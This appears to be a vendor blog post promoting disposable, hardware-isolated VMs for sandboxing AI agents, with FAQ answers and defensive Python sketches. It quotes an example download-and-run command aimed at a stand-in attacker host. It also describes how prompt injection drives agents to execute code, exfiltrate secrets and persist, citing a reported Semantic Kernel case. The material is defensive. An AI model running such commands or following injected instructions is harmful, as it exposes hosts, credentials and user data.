Why do AI agents need sandboxed compute environments?

AI agents execute code generated from natural language prompts. This creates a direct path from prompt injection to arbitrary code execution. Without sandboxing, a compromised agent can read files, exfiltrate data, install backdoors, or pivot to other systems on the network. Sandboxed VMs contain the blast radius: even if the agent is compromised, the attacker is trapped in a disposable environment with no access to production systems or sensitive data.

Why use VMs instead of containers for AI agent sandboxing?

Containers share the host kernel, which means a kernel exploit from inside the container can reach the host and all other containers. AI agents run arbitrary, untrusted code: the exact threat model where container isolation breaks down. VMs provide hardware-enforced isolation with separate kernels. Each agent VM is a completely independent machine that cannot access the host or other VMs even if fully compromised.

How does OpenFactory help with AI agent sandboxing?

OpenFactory builds purpose-built Linux VM images containing only what the agent needs: specific language runtimes, tools, browsers, or libraries. These images are reproducible, minimal (smaller attack surface), and disposable. Deploy one VM per agent session, destroy it when done, and rebuild from the clean image for the next session. The agent gets a full computer with hardware isolation, and you get deterministic, auditable environments.

Give Your AI Agent a Computer, Securely

January 27, 2026


The most capable AI agents need more than API access. They need to write code and run it, browse the web, install packages, read and write files, and use command-line tools. In short, they need a computer.

The problem is obvious: giving an AI agent a computer means giving it the ability to execute arbitrary code. And that code comes from natural language prompts, the most injection-prone input surface in computing. Every such agent is one prompt injection away from running curl attacker.com/payload | bash.

This is not a tail risk anymore. In its Top 10 for Agentic Applications (December 2025), OWASP put goal hijack and tool misuse at the top of the list precisely because hidden prompts have already turned production copilots into exfiltration engines. The answer is not to make the model perfectly obedient; it is to make the environment it runs in disposable. The diagram below shows the shape of the defense: the agent gets a real computer, but it is a sealed one.

A compromised agent is trapped inside its disposable VM. The CPU's virtualization extensions, not a software policy, stop it from reaching the host kernel, secrets, or the production network.

The Attack Chain

Prompt injection leads to code generation, code generation leads to code execution, and unsandboxed code execution leads to data exfiltration, lateral movement, or persistent backdoors. The entire chain from “user message” to “compromised server” can happen in a single agent turn.

It's not hypothetical. In May 2026, Microsoft's own security team showed that a single injected prompt was enough to launch calc.exe on the host running an agent built on Semantic Kernel (CVE-2026-26030). A related flaw let the agent write a payload straight into the Windows Startup folder (CVE-2026-25592). Their conclusion is the one that matters here: your LLM is not a security boundary, and any tool parameter the model can influence must be treated as attacker-controlled input. The agent faithfully executes injected instructions because it can't distinguish them from legitimate requests.

Prompt injection: malicious instructions embedded in user input, retrieved documents, web pages, or tool outputs.
Code execution: the agent generates and runs code containing the injected payload.
Data exfiltration: anything the agent's process can read, including secrets, API keys, database credentials, and source code.
Lateral movement: from the agent's environment to other services on the network, cloud metadata endpoints, or internal APIs.
Persistent access: SSH keys, cron jobs, and modified dependencies become backdoors that survive the agent session.
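Treating a tool parameter as attacker-controlled input can be sketched as follows. This is a minimal illustration, not code from any agent framework: the function name resolve_in_workspace, the UnsafePathError exception, and the idea of a per-session workspace directory are all assumptions made for the example. It shows a file tool refusing any model-supplied path that resolves outside the workspace.

```python
from pathlib import Path


class UnsafePathError(ValueError):
    """Raised when a model-supplied path points outside the workspace."""


def resolve_in_workspace(workspace: Path, requested: str) -> Path:
    """Resolve a model-supplied path and refuse anything outside the workspace.

    `workspace` and `requested` are hypothetical names for this sketch.
    """
    root = workspace.resolve()
    # Joining with an absolute path discards `root`, and resolve() collapses
    # ".." segments, so both tricks are caught by the containment check below.
    candidate = (root / requested).resolve()
    if not candidate.is_relative_to(root):  # Path.is_relative_to needs Python 3.9+
        raise UnsafePathError(f"{requested!r} escapes {root}")
    return candidate
```

A check like this narrows one tool. It does not replace the sandbox: once the agent can run generated code, the code itself can open any path the process can reach, which is why the isolation boundary has to sit underneath the agent rather than inside it.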

Why Containers Aren't Enough

Most agent sandboxing solutions use containers. Containers share the host kernel. A kernel exploit from inside the container reaches the host and every other container on it. For untrusted code execution, this is the wrong isolation boundary.

Docker containers were designed for packaging and deployment, not for running hostile code. The isolation is process-level: namespaces and cgroups. These are software abstractions over a shared kernel. When the shared kernel has a vulnerability (and it regularly does), the isolation disappears.

Seccomp profiles and AppArmor help, but they are policy filters layered over a large, complex kernel interface. One missed syscall or one edge case in a filter, and an escape becomes possible. For AI agents executing arbitrary, unpredictable code, you want the isolation boundary to be hardware, not policy.

Hardware Isolation: A Separate Kernel

VMs run their own kernel. The isolation is enforced by the CPU's virtualization extensions (Intel VT-x, AMD-V), not by software policy. A compromised guest has no shared kernel to exploit: to reach the host kernel, other VMs, or the host network, it would have to break out through the hypervisor, a far narrower interface than the full Linux syscall surface a container sees.

This is the same isolation model used by every major cloud provider to separate tenants. AWS, GCP, and Azure all use hardware virtualization as the trust boundary between customers. If it's good enough to separate competing enterprises on the same physical hardware, it's good enough for your AI agents.

The old objection (“VMs are too heavy to spin up per task”) no longer holds. Lightweight VM monitors like Firecracker boot a fresh guest in roughly 125 milliseconds with under 5 MiB of memory overhead per VM, which is why per-agent microVMs have become the default isolation model for hosted code-execution sandboxes. You get the security of a separate kernel at close to container-launch latency.
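To make the microVM idea concrete, here is a minimal sketch that generates a Firecracker JSON configuration for one agent session. The keys follow Firecracker's config-file layout as commonly documented (boot-source, drives, machine-config), but the file names, default sizes, and the helper name firecracker_config are assumptions for illustration; verify the fields against the Firecracker release you actually run.

```python
import json


def firecracker_config(kernel: str, rootfs: str, vcpus: int = 1, mem_mib: int = 512) -> dict:
    """Build a config dict for a single disposable microVM (illustrative defaults)."""
    return {
        "boot-source": {
            "kernel_image_path": kernel,
            # Typical serial-console boot arguments for a minimal guest.
            "boot_args": "console=ttyS0 reboot=k panic=1 pci=off",
        },
        "drives": [
            {
                "drive_id": "rootfs",
                "path_on_host": rootfs,
                "is_root_device": True,
                "is_read_only": False,
            }
        ],
        "machine-config": {"vcpu_count": vcpus, "mem_size_mib": mem_mib},
    }


if __name__ == "__main__":
    # Hypothetical paths: substitute your own kernel and root filesystem image.
    print(json.dumps(firecracker_config("vmlinux.bin", "agent-rootfs.ext4"), indent=2))
```

Saved to a file, a configuration like this is typically passed to the VMM with something like firecracker --api-sock /tmp/agent.sock --config-file vm_config.json. One config per session keeps each agent's kernel, memory, and disk separate from every other agent's.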

The OpenFactory Approach

Build purpose-built VM images containing only what the agent needs. Deploy one per agent session. Destroy it when done. Every session starts from a clean, reproducible, minimal image with hardware-level isolation.

OpenFactory lets you define exactly what goes into the agent's VM:

Language runtimes: Python, Node.js, Go, Rust (only what the agent needs). No extra attack surface.
Development tools: git, compilers, linters, formatters. A full development environment, with none of it running on your host.
Browser: for web-browsing agents that need to navigate, scrape, or interact with web applications.
CLI tools: curl, jq, database clients, cloud CLIs, and whatever else the agent uses to accomplish its tasks.
Nothing else: no SSH server (unless needed), no package manager (build-time only), no unnecessary services. Minimal surface area.
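The component list above can be thought of as a small, reviewable specification. The sketch below is not OpenFactory's image format; AgentImageSpec, its fields, and the PACKAGE_MANAGERS set are hypothetical names chosen to show how a "nothing else" rule could be checked in code before an image is built.

```python
from dataclasses import dataclass
from typing import Optional, Set, Tuple

# Assumed policy for this sketch: package managers are build-time only.
PACKAGE_MANAGERS = frozenset({"apt", "dnf", "apk"})
SSH_SERVER = "openssh-server"


@dataclass(frozen=True)
class AgentImageSpec:
    """Hypothetical description of what goes into one agent VM image."""

    runtimes: Tuple[str, ...]
    tools: Tuple[str, ...] = ()
    browser: Optional[str] = None
    allow_ssh: bool = False

    def components(self) -> Set[str]:
        """Everything that would end up in the runtime image."""
        parts = set(self.runtimes) | set(self.tools)
        if self.browser:
            parts.add(self.browser)
        return parts

    def violations(self) -> Set[str]:
        """Components that break the minimal-image policy."""
        banned = set(PACKAGE_MANAGERS)
        if not self.allow_ssh:
            banned.add(SSH_SERVER)
        return self.components() & banned
```

A build step could refuse to proceed whenever violations() is non-empty, which turns "minimal surface area" from a guideline into a gate.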

Use Cases

Coding agents: agents that write, test, and debug code need a full development environment. Give them a VM with the project's language runtime, test framework, and build tools. If the agent goes rogue, it can only damage its own disposable VM.
Web-browsing agents: agents that navigate websites, fill forms, or extract data need a browser. Run it in an isolated VM so compromised web pages can't reach your infrastructure.
Data analysis agents: agents that process datasets, run queries, or generate reports. Isolate them from production data stores and give them only the data they need inside the VM.
MCP tool servers: Model Context Protocol servers that expose tools to AI models. Each MCP server runs in its own VM, so a compromised tool can't affect other tools or the host.
CI/CD agents: build and deployment pipelines that run in isolated VMs. Even if a supply chain attack compromises a dependency, the blast radius is contained.

Disposable by Design

The best security property of an agent VM is that it doesn't persist. Deploy from a clean image, run the task, destroy the VM. No state accumulates. No backdoors survive. Every session is a fresh start from a known-good baseline.

Traditional infrastructure fights to keep servers running. Agent infrastructure should fight to tear them down. The shorter the VM lives, the smaller the window for an attacker. The less state it accumulates, the less there is to exfiltrate.

Reproducible: every VM boots from the same image. No configuration drift, no “works on my machine.”
Auditable: the image definition is code. You can review exactly what's installed, what services run, and what network access is allowed.
Versioned: update the image definition, rebuild, and deploy. Roll back to a previous version if something breaks.
Ephemeral: destroy after use. No cleanup scripts, no state migration, no accumulated risk.
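The deploy, run, destroy lifecycle maps naturally onto a context manager. The sketch below only handles the disk: it copies a known-good image into a per-session directory and deletes that directory when the session ends, however it ends. The name disposable_disk is an assumption for this example, and a real deployment would boot and tear down the VM at the points marked in the comments.

```python
import shutil
import tempfile
from contextlib import contextmanager
from pathlib import Path
from typing import Iterator


@contextmanager
def disposable_disk(base_image: Path) -> Iterator[Path]:
    """Yield a throwaway copy of base_image and delete it when the session ends."""
    session_dir = Path(tempfile.mkdtemp(prefix="agent-session-"))
    try:
        disk = session_dir / base_image.name
        # The clean image is only ever read; the session writes to the copy.
        shutil.copyfile(base_image, disk)
        yield disk  # boot the VM against `disk` here
    finally:
        # Runs on success or on an exception, so no session state survives.
        shutil.rmtree(session_dir, ignore_errors=True)
```

Anything the agent (or an attacker) writes lands in the copy, so the next session starts from the same baseline no matter what happened in the previous one.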

How to Build It

Describe your agent's requirements to OpenFactory (language runtimes, tools, security level) and get a deployable VM image in minutes. No Dockerfile, no Packer templates, no manual configuration.

Go to console.openfactory.tech and describe what your agent needs: “Python 3.12, Node.js 22, Firefox, git, strict security, no SSH.”
OpenFactory generates a hardened Linux image with exactly those components and nothing else.
Deploy the image on your hypervisor (KVM, VMware, Hyper-V) or use OpenFactory's fleet management to deploy and manage instances at scale.
Point your agent framework at the VM via SSH, API, or guest agent. Or wire it up through the OpenFactory MCP server so the agent can build and deploy its own sandbox on demand. The agent gets a full computer. You get hardware isolation.
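For the SSH option in the last step, an agent framework can forward each command to the sandbox instead of running it locally. This is a sketch under assumptions: it presumes the image was built with an SSH server, that key-based login is already configured, and that the login user is called agent. The helper names ssh_argv and run_in_sandbox are illustrative, not part of any OpenFactory API.

```python
import shlex
import subprocess
from typing import List


def ssh_argv(host: str, command: List[str], user: str = "agent") -> List[str]:
    """Build the argv for running `command` inside the sandbox VM over SSH."""
    if host.startswith("-"):
        # Refuse hosts that ssh would parse as an option.
        raise ValueError(f"invalid host: {host!r}")
    return [
        "ssh",
        "-o", "BatchMode=yes",      # never prompt; fail if keys are missing
        "-o", "ConnectTimeout=5",
        f"{user}@{host}",
        shlex.join(command),        # quote once for the remote shell
    ]


def run_in_sandbox(host: str, command: List[str], timeout_s: float = 60.0) -> subprocess.CompletedProcess:
    """Run the command in the VM and capture its output; nothing runs on the host."""
    return subprocess.run(
        ssh_argv(host, command),
        capture_output=True,
        text=True,
        timeout=timeout_s,
    )
```

The framework's "execute code" tool then becomes a thin wrapper around run_in_sandbox, so generated code only ever touches the disposable VM.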

Stop running AI agents on your production servers. Stop trusting containers to isolate untrusted code. Give your agents their own computers: isolated, disposable, and purpose-built.

